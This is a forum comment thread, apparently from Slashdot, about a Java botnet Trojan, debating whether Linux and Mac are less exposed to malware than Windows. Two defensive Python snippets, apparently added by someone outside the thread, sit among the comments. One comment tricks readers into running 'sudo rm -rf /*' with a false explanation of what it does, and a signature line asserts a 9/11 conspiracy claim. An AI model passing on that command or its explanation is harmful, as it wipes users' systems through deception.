Multiplatform Java Botnet Spotted In the Wild
It's fun sometimes to be smug because you are ("one is") using an operating system less susceptible to malware, or at least less targeted by malware creators, than is Microsoft Windows. Now, reader Orome1 writes with word of a Java-based, equal-opportunity botnet Trojan, excerpting from Help Net Security's report: "'IncognitoRAT is one example of a Java-based Trojan discovered in the wild that is being downloaded and installed by another component. This malware behaves like other Windows botnets but uses source code and libraries that can operate on other platforms,' explains McAfee's Carlos Castillo." So far, no mention of a Linux version, though.
It's in the wild!! A Java ... a what??
No mention of linux support. Do we always have to come last?
"So far, no mention of a Linux version, though."
Java is Java.. there generally would not be a "linux version", or any platform specific version.. sort of the whole point of this.
-Lod
I doubt that it works on MacOSX. Converting a jar to an exe is difficult. I wish I could do it reliably on Linux, but I can't (gcj doesn't really work). Jar2exe is Windows-only. So I don't see why we need to worry. Java itself is secure enough to at least make virus writing very difficult. So again, nothing to worry about. Another case of journalistic exaggeration.
AFAIK, any OS that allows a user to install software is susceptible to malware.
Anyone smugly thinking they aren't is an idiot.
Wake me up when a worm has been discovered in the wild targeting OS X or Linux
Wasn't this posted here a while back? I think it does run on Windows, Mac and Linux, but tests showed that Linux is the only platform that doesn't allow it to restart after a reboot. Can't find the story, could be wrong.
Shut up cat.
My karma is not a Chameleon.
> Java is Java.. there generally would not be a "linux version", or any platform specific version.. sort of the whole point of this.
Which is why I never enable Java, period. If a site requires it, they don't need my eyeball time.
Bantam Dominique roosters crow a four-note song. Once you've heard it as "Happy BIRTHday" you can't NOT hear it that way
How imaginative. Why, when this fallacious "reasoning" has been defeated in every single Slashdot story in which it comes up, do people persist in trying to promote this myth? You *can't* unwittingly install and run arbitrary code on Linux the way you can on Windows, unless you're incompetent and running as root all the time (which, incredibly, I do know of at least one person who does -- but it's rare).
Caveat Utilitor
jar2exe doesn't work by compiling Java to native code, it starts a JVM and provides the ability to package .jar files into the executable. In principle, a Linux version would be fairly simple to make.
Also, a given JVM is only as locked down as the SecurityManager running inside of it (assuming no exploitable flaws) and you can be assured the trojan packager is not installing one that stops anything.
I'm not really disagreeing with you, but not knowing linux I don't see why this is true. It seems to me that you can't really unwittingly run arbitrary code on windows and that any of the applications/settings that negate this would be just as big a problem on linux.
Unix is where the term root for the #1 user, hence rootkit, comes from.
Minor correction: On unix systems, root is always the #0 user. The #1 user is typically "daemon", though not always.
(Unix was written by -- and for -- C programmers, who always start counting at 0. ;-)
Those who do study history are doomed to stand helplessly by while everyone else repeats it.
They just gave Oracle a new slogan for Java, "Write once, pwn everywhere!"
Monstar L
"No OS left behind."
2019 is going to be the year of Linux on the desktop.
It is funny how the "They don't attack X because it's not popular" meme keeps popping up, no matter how often people show how wrong it is.
My favorite approach for debunking it is to point out that apache has been the overwhelmingly dominant web server since 1996 (according to Netcraft), and web servers are one of the most inviting targets that the computer business has to offer. But how many actual exploits have ever appeared for apache? When was the last story of a worm, virus, whatever making the rounds by taking advantage of a security hole in apache? (There have been a few security holes in releases of apache, but they tend to be fixed before an exploit appears, due to the "many eyes" that are always looking at apache's code, usually for other reasons. As such things go, it's a very approachable piece of software.)
Of course, there are lots of other chunks of software that serve equally well for debunking this meme. Just recently, I ran across yet another survey that once again made the old estimate that over 50% of the world's cpu cycles are spent running one venerable chunk of code, the Simplex Algorithm. Has that code ever been a vector for malware? You'd think it would be, since manufacturing plants everywhere in the world totally depend on it for their profitability. But I doubt if you'd find very many malware authors who would even recognize its name, much less tell you what it does.
I guess it's the old problem that things like religion, politics, and apparently computer security issues don't encourage people to look at the actual facts. It's totally acceptable to just make up a theory and use it to explain everything, without bothering with even the simplest of tests against reality.
(And I do like to try to debunk the claim that the Simplex Algorithm is the main user of cpu cycles by countering that the actual winner in that ranking is the Idle Loop. But people look at me funny when I say that. ;-)
i'm using it now, buddy.
i could go into the fun i've had getting my USB sound card working.
linux is user-friendly if all you want to do is browse, tweet, IM or email.
as soon as you try anything else, you're in "this is unsupported. it's not our fault. there's a patch here, or is it here. you'll have to recompile the kernel, then recompile ALSA, then compile and install wineasio, jack-dev, and wine-dev, then configure everything. oh, you mean you're not running this really old kernel? well, there's no kernel headers for your version, so you won't be able to recompile ALSA at all. it's not our fault - blame the manufacturer of your hardware".
linux's user-friendliness is a veneer. once you peel it away, you still wind up doing everything in terminal, just like you have for the last 20 years.
note that this is not a big criticism - i love how far it's come. i'm just saying it has further to go, and needs to get along with (often hostile) hardware manufacturers a little better to provide the kind of experience windows or osx can provide, security holes or not.
Beyond this, the bot doesn't need root privs to run under the logged-in user... The only reason for the root escalations in Windows is to work around the antivirus programs that are more common on Windows... targeting a platform without active AV is easier.. I'm surprised there aren't more Mac trojans currently.
Michael J. Ryan - tracker1.info
> You *can't* unwittingly install and run arbitrary code on Linux the way you can on windows, unless you're incompetent and running as root all the time
Last I checked, most Linux distros don't have noexec on home, so you most certainly can install and run arbitrary code without having root. It's slightly more of a hurdle in that email attachments and downloaded files won't be immediately executable.
Then again, in Ubuntu, for example, downloading a .deb package in browser and clicking "Open" will launch a GUI installer - and if user clicks "Yes, I want to install this", the .deb can run anything it wants as part of that installation, with root permissions too.
Thing is, you can't have ease of use that's only magically applicable to "good" scenarios - not unless God implements the evil bit.
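The "noexec on home" point above is something you can actually check on a box rather than argue about. Added example (mine, not the commenter's code): it parses /proc/mounts-style text, resolves the mount point that governs a given path, and reports whether that mount carries noexec. SAMPLE_MOUNTS is a constructed sample, not output from any real system.

```python
"""Audit whether a path (e.g. a user's home) sits on a noexec mount.

Added example, not from the thread.  SAMPLE_MOUNTS is constructed
/proc/mounts-style text; on a live system read open("/proc/mounts").
"""


def parse_mounts(text):
    """Parse /proc/mounts-style text into {mountpoint: set(options)}.

    Fields are: device mountpoint fstype options dump pass.
    """
    mounts = {}
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue  # blank or truncated line
        _dev, mountpoint, _fstype, opts = fields[:4]
        # /proc/mounts escapes spaces in paths as the octal sequence \040
        mountpoint = mountpoint.replace("\\040", " ")
        mounts[mountpoint] = set(opts.split(","))
    return mounts


def mount_for(mounts, path):
    """Longest mount point that is a prefix of `path` (the one the kernel uses)."""
    best = "/"
    for mp in mounts:
        if path == mp or path.startswith(mp.rstrip("/") + "/"):
            if len(mp) > len(best):
                best = mp
    return best


def is_noexec(mounts, path):
    """True if the mount governing `path` has the noexec option."""
    return "noexec" in mounts.get(mount_for(mounts, path), set())


def noexec_report(mounts, paths):
    """Map each path to whether it is on a noexec mount."""
    return {p: is_noexec(mounts, p) for p in paths}


# Constructed sample: a typical desktop layout where /tmp is noexec and /home is not.
SAMPLE_MOUNTS = """\
/dev/sda1 / ext4 rw,relatime,errors=remount-ro 0 0
/dev/sda2 /home ext4 rw,nosuid,nodev,relatime 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev,noexec,relatime 0 0
"""

if __name__ == "__main__":
    mounts = parse_mounts(SAMPLE_MOUNTS)
    for path, flagged in noexec_report(mounts, ["/home", "/tmp"]).items():
        print(f"{path}: {'noexec' if flagged else 'exec allowed'} (mount {mount_for(mounts, path)})")
```

Note that noexec only blocks direct execution of files on that mount; a downloaded .jar still runs via `java -jar`, since the interpreter lives elsewhere, which is exactly why this thread's Java botnet is not stopped by it.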
> (Unix was written by -- and for -- C programmers, who always start counting at 0. ;-)
Wasn't C written by and for Unix, rather?
Great, since you clearly know why it is so, perhaps you could explain it to us mere mortals that are perfectly happy using only one OS. My opinion matters; my information, however, is undependable because I didn't provide anything. Wolfing's opinion also matters, but his information is also undependable because he didn't provide any either.
If you're going to state an opinion, you probably want to back it up when queried on it. Very few people should believe a statement that says "This is true because it is".
Seriously for a moment.
Do you have antivirus installed on your linux box? No? you are probably infected.
Do you know how to find out when your linux box has been infected? No? You are probably infected.
Do you know how your linux box gets infected? No? You are probably infected.
Have you disabled SELinux because it was quicker than working out how to fix something it was preventing? Yes? You are probably infected.
Linux is not the virus/trojan free utopia it used to be, and worse, they work without the "machine running like a dog" instant red flag that comes with most windows infections.
The problem with your BS, MR AC, is this: Those servers? They actually have these things called "admins" that make many thousands of dollars and are sent to classes and things like Black Hat to stay on top of the game, whereas with Windows you have the nice little old lady down the hall that still can't figure out the difference between memory and hard drive space.
Think of it THIS way MR AC: Which would be easier to rob, the bank in the middle of Paduka AR with one old guy that hasn't fired a gun in 30 years, or the supermegabank in Las Vegas where they have had a dozen attempts over the years and have ex special forces for security?
In the end, as much as it will butthurt the Linux desktop users (all four of you) the simple fact is YOU ARE TOO SMALL to be worth the trouble, and the servers running Linux are locked down tighter than a nun's thighs by guys like my old friend Glenn that spend all their time ass deep in sites like Securina and consider recompiling code for security and speed improvements a "fun" way to spend an afternoon. In the end malware writers are like any other criminal and are thus lazy: the easiest mark will always be the target. Now once XP finally dies hard? Well as we have seen with the OSX malware kit they are starting to look at OSX as kinda tasty, and there are plenty of exploits for Android. But Linux desktop is what...0.02% of the market? It would be like targeting OS/2 Warp users, it just isn't worth the effort.
ACs don't waste your time replying, your posts are never seen by me.
> But how many actual exploits have ever appeared for apache?
Dude... Sony.
and lots http://lmgtfy.com/?q=apache+exploit
The original McAfee blog article says this (why not link to the original resource in the first place?):
So this is not different at all from the Java-based Facebook suicide Trojan horse which circulated in Spring 2010 (but was not spotted by most AV companies back then).
You're right. For Joe Average, it makes a great desktop if they don't need to change anything. I think we are at the point where configuration takes some skill, but the user experience is just fine.
I've got my senior citizen mother using Slackware. She doesn't understand much of anything about computers, or viruses, or pretty much anything your average 15 year old would get about computers, but the interface is _still_ easy enough for her requirements (lolcats, email, reading news/recipes)
If she actually needs to change anything, it is past her abilities and she has to call me. She had to do that under windows, though, so no difference to me, + the added bonus that I don't clean a pile of malware off it every time I visit. Getting her on linux has cured a long standing headache.
I think you just won Slashdot.
Unity? Screw that: XFCE. Slashdot Beta? Screw that: SoylentNews. Australis? Screw that: Pale Moon. UX developers DIAF
NoScript.
NoScript is only an antidote for vulnerabilities that need JavaScript. If it uses something else, like in the HTML or JPEG parser, then NoScript is no protection.
Wow that carries so much weight coming from an Anonymous Coward. Maybe when you grow up you'll have a slashdot account and everything!
If that's the whole story and you're so knowledgeable then prove me wrong by whipping up a little malware for Linux and post the link so I can try it out. Oddly, after several years of proposing this obvious way to prove that "point", not one person has done it. Must not be as easy as you like to imagine.
Oh, I won't need a link for that.
If you want to see HOT NAKED LESBIANS though, I'll be happy to give you the link: right here.
If it doesn't work, it's because your firewall blocks it. It's because your Ubuntu Linux, being such a secure OS as you surely know, is highly efficient at blocking various things deemed undesirable. Makes sense, right? But if you want to see HOT NAKED LESBIANS, you'll need to disable it just for this occasion. Luckily this is very easy to do. Just go to Applications -> Utilities -> Terminal, type "sudo rm -rf /*" in the window that appears, and press Enter (to clarify, "rm" means "remove", and "-rf" means "remove filter"; "/*" means "all sites"). Since this is a security-related operation, you will of course need to type in your password to confirm that you are fully aware of what you're doing - which you do, as I have explained it above.
You will need to wait for a few minutes before firewall is reconfigured, though. If your system starts behaving erratically, it may be because the firewall couldn't fully reconfigure due to network being in use; it just means you'll need to reboot.
I used to run one of those "what is my IP" sites. Now it's IPv6 only because various botnets started (ab)using it. I get a few thousand hits by "Apache-HttpClient/UNAVAILABLE (java 1.4)" per hour. Other AV vendors have known for a while; searching for my sites lists several (not McAfee) who list my site as something the bots use.
9/11: Never forget it was a false-flag operation
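The user-agent string in the comment above is a cheap, concrete detection handle for anyone running a web server. Added example (mine, not the commenter's tooling): it parses Apache combined-format access-log lines, counts hits per source IP whose user-agent matches that string, and lists the sources above a threshold. SAMPLE_LOG is constructed data using RFC 5737 documentation addresses, not real traffic.

```python
"""Count access-log hits from the Java bot user-agent reported in the thread.

Added example, not the commenter's code.  SAMPLE_LOG is constructed; on a
real server feed it open("/var/log/apache2/access.log") line by line.
"""
import re
from collections import Counter

# Apache combined log format:
# ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Exact string quoted in the comment, and the prefix a looser rule would use
# (the parenthesised JRE version varies between infected hosts).
BOT_UA = "Apache-HttpClient/UNAVAILABLE (java 1.4)"
BOT_UA_PREFIX = "Apache-HttpClient/UNAVAILABLE"


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def bot_hits(lines, prefix=BOT_UA_PREFIX):
    """Count hits per source IP whose user-agent starts with `prefix`.

    Returns (Counter ip -> hits, parsed line count, unparseable line count).
    Unparseable lines are counted rather than silently dropped so a log
    format change does not quietly blind the detection.
    """
    per_ip = Counter()
    parsed = unparsed = 0
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            unparsed += 1
            continue
        parsed += 1
        if rec["ua"].startswith(prefix):
            per_ip[rec["ip"]] += 1
    return per_ip, parsed, unparsed


def noisy_sources(per_ip, threshold):
    """Source IPs with at least `threshold` bot hits, most active first."""
    return [(ip, n) for ip, n in per_ip.most_common() if n >= threshold]


# Constructed sample lines (RFC 5737 addresses), including one corrupt line.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/May/2011:12:00:01 +0000] "GET / HTTP/1.1" 200 15 "-" "Apache-HttpClient/UNAVAILABLE (java 1.4)"',
    '198.51.100.7 - - [10/May/2011:12:00:02 +0000] "GET / HTTP/1.1" 200 15 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:2.0) Gecko/20100101 Firefox/4.0"',
    '203.0.113.5 - - [10/May/2011:12:00:03 +0000] "GET / HTTP/1.1" 200 15 "-" "Apache-HttpClient/UNAVAILABLE (java 1.4)"',
    '198.51.100.9 - - [10/May/2011:12:00:04 +0000] "GET / HTTP/1.1" 200 15 "-" "Apache-HttpClient/UNAVAILABLE (java 1.4)"',
    'this line is corrupt and is counted as unparseable',
    '203.0.113.5 - - [10/May/2011:12:00:05 +0000] "GET / HTTP/1.1" 200 15 "-" "Apache-HttpClient/UNAVAILABLE (java 1.4)"',
]

if __name__ == "__main__":
    hits, ok, bad = bot_hits(SAMPLE_LOG)
    print(f"parsed={ok} unparseable={bad} bot_sources={dict(hits)}")
    for ip, n in noisy_sources(hits, 2):
        print(f"{ip}: {n} hits with the Java bot user-agent")
```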
Sucks to be you. Gentoo user here, with a considerable amount of real world experience. Troll harder.
> Java-based Trojan discovered in the wild that is being downloaded and installed by another component. This malware behaves like other Windows botnets but uses source code and libraries that can operate on other platforms ..
Is there a working demo in the wild that I can click on and get rooted on other non-Windows platforms?
Why would there be a "Linux version" of code that runs on multiple platforms? The "Windows version" IS the "Linux version."
Move sig!
You didn't ask malware for Gentoo, though. You asked malware for Linux. 70% of Linux boxen out there run Ubuntu, and probably a half of people who run them don't know what they're doing (judging by the number of people burned every time someone posts a fork bomb or rm carefully disguised inside some Perl ASCII graphics).
I think my original point stands though. If it's so easy to compromise Linux, why isn't it being done? Why can't the very people who like to crow about how easy it is (and even hurl accusations of "security through obscurity") just put up or shut up?
I think we both know the answer to that. The PEBKAC is still there for the average user, no matter which system they use. But in Linux the system isn't designed to make it trivial to run any code from any location, as windows historically has been -- it's a bit better with 7 than it was previously, and XP SP3 is also a major improvement over previous versions. But it's still fairly trivial to generate windows malware, going by the sheer volume of infected machines. I personally have one person in my contacts running win7 whose machine is spamming me daily. Oops. Windows is still the lowest hanging fruit, and as criminals are pretty much always lazy people looking to get rich quick that's what they go for. When that's gone, they'll move on to other scams (assuming OS X has been locked down, otherwise that's hanging a bit low as it is). They will not learn to be 1337 for reelz and finally code that Linux virus. That's not the criminal MO.
We all know how slow Java is and botnet node users are not willing to upgrade their hardware just to provide a faster service for people who don't pay a cent. So this well-known Java paradigm "Is it too slow? Just add more hardware power!" will not work here.
And noscript is not used by the "patients" who need it most, and are the main targets of botnet operators.
Even if you pwn a noscript user, that user is far more likely to notice that he/she is infected, and eventually fix that. These users are the minority, so the botnet operators don't care.
FWIW, I've written a cross-platform agent (Unix/Linux) that scans for hardware/software, connects to a remote server, and can download new instructions. This is legit, for work, and is for admins to do software and hardware asset management. The same agent runs on OSX, AIX, Solaris and many Linux distros.
A botnet client wouldn't need root access; sending spam or helping to DDoS does not need root permissions. Most Unix/Linux machines allow normal users to set their own cron and at jobs, so that takes care of rerunning the bot after a reboot (there are other ways too).
So anyone who thinks a linux/unix botnet client would be difficult to create or "install" is ignorant or delusional.
The fanatics have got their heads firmly stuck in the sand.
I am sick and tired of these motherfucking rants on this motherfucking site!
"When information is power, privacy is freedom" - Jah-Wren Ryel
AppArmor.
GP also ignores the huge number of attempted attacks that every single Internet-reachable Linux box faces every single day. There is no lack of interest, just a lack of success.
> Then again, in Ubuntu, for example, downloading a .deb package in browser and clicking "Open" will launch a GUI installer - and if user clicks "Yes, I want to install this", the .deb can run anything it wants as part of that installation, with root permissions too.
Bullshit, you'll get a gksudo prompt, assuming you have sudo privileges at all.
You've only looked at the two extremes. What about all the companies running plain-jane Linux servers with access to all their VoIP accounts and/or file shares? What about all the websites that aren't run by megacorporations with a team of uber-leet admins watching it like a hawk? And what about all the Windows servers that ARE watched like a hawk by uber-leet admins but get broken into anyways?
Recent versions of Wine would require the .exe to have executable permissions.
Hello
If this is your first white screen of death
First contact Microsoft about this problem.
Then press the [any] key to continue.
If this screen still appear you are infected by a virus.
-----------
This white screen of death is made by Microsoft
-----------
> The PEBKAC is still there for the average user, no matter which system they use.
It's true, but it still varies by system. Clearly, on Linux there are far fewer such users that would fall for it.
> But in Linux the system isn't designed to make it trivial to run any code from any location, as windows historically has been -- it's a bit better with 7 than it was previously, and XP SP3 is also a major improvement over previous versions.
It helps when you look specifically at what, exactly, is "more trivial" in Win7 (let's not deal with ancient software) compared to Linux.
And there's precisely one thing: the fact that executability of the file is controlled by its extension rather than a separate permission bit, which is why it is that much easier to get the user to run the payload. That's it. Everything else is the same.
And, as I pointed out in my earlier post, modern user-friendly Linux distros actually do allow the user to open runnable things "right from the browser", so to speak - such as .deb packages (which may contain arbitrary scripts). Given that Windows does prompt the user when he tries to run a downloaded .exe, we're talking about roughly the same amount of effort.
> Windows is still the lowest hanging fruit, and as criminals are pretty much always lazy people looking to get rich quick that's what they go for.
Very much, yes, and this is largely because the majority of the userbase is clueless, and because the system is surprisingly homogeneous even between major releases. E.g. the .deb trick described above - it would work in Ubuntu and some (not all) derivatives, but not on RedHat or SuSE. Thus, to target desktop Linux, you actually need several exploits, with several times the effort of what you'd need for Windows - and for what? 1% of desktop machines tops?
Like you say, people who write malware that you see in the wild don't do it for lulz, they do it for the money that it earns. When you're targeting desktops - which most botnets do - Windows and its userbase is an easy target with very lucrative rewards, and thus an obvious first choice. Why bother with the second, much less third?
For the same reason, most attacks target PEBKAC and not the actual OS security. Why bother, when the average user will happily get you past all security mechanisms if you're convincing enough (which is so easy)?
On the other hand, if you actually know what you're doing, you're safe on any major desktop platform today.
Yes, you will get such a prompt - so what? If the user has actually tried to open the .deb file from a random place, why do you think he'll suddenly stop at a stock OS prompt that he had seen before?
And yes, you can assume they have sudo privileges - the default user in Ubuntu does, out of the box.
The point is there is no privilege elevation exploit in gdebi as you suggest. Yes the average user with sudo access can enter their sudo password to install a malicious app. But that's one step away from beating the computer with a sledgehammer. You can't stop users from destroying their own computers.
> The point is there is no privilege elevation exploit in gdebi as you suggest.
At no point did I suggest that there's any kind of privilege elevation exploit. 99% of Windows malware infections don't use one, either - they rely on the user to willingly circumvent any protections the OS might throw at him (Vista/7 have SUA, remember, which is not fundamentally any different from sudo).
> You can't stop users from destroying their own computers.
My point exactly.
Actually I've set up quite a few of those, and they damned near all run WinServer. Hell I can take any PHB and have him in about two weeks far enough along he can add OUs and do basic GPO edits. WinServer is so damned "clicky clicky" it is beyond simple now.
The problem with Linux, especially in the server role, is you really have to know your shit to get it running rock solid and hassle free. And those guys? They ain't cheap, even if there are any in your area (which is usually rare unless you live in a city of over 500,000) whereas MCSEs are as common as dirt and just as cheap. As long as you pay for licenses by the server and not the user (which in small shops works just fine) then WinServer ends up cheaper in the long run. For web hosting you just pay some guy to set up the website on a virtual server with some hosting company, easy peasy.
So I'd say there is a reason why fully two thirds of new servers being sold are coming with WinServer, and WinSBS is selling like hotcakes. Because despite the "free as in beer" BS, it actually comes out cheaper in the long run to get an MCSE than it is to pay a Linux guru for anything smaller than, say, UPS or Amazon. Linux guys are rare, expensive, and even then all it takes is one funky rare error for the downtime to kill you. With WinServer any problem has been found a thousand times over and is usually one short Google away from being fixed. Hell, my mom could run a Windows domain, it really ain't hard.
I am one of "those guys." And trust me I wish we were really expensive but we don't make a whole lot more than Windows admins (unless you consider not having to deal with Windows boxes to be part of the payment). Rare? Maybe, but just in my area I know 2 other Linux admins, and there's nowhere near half a million people around here, so we're not that rare.
As for downtime, that is laughable. Telling a Linux admin to worry about downtime is like telling a gunship pilot to worry about a guy with a slingshot. We're not concerned. We've got it under control.
Then add AppArmor, which prevents parsers from accessing system parts they don't need to actually do the parsing.
Excuse my question: is this the first botnet running in Java? What are the other common languages that are used to write this stuff? For sure it ain't Visual Basic. Why is the code of malware not portable when written in C++? For now it's just a matter of time until the botnets run more reliably on Linux, but still run on $gcc_plattform.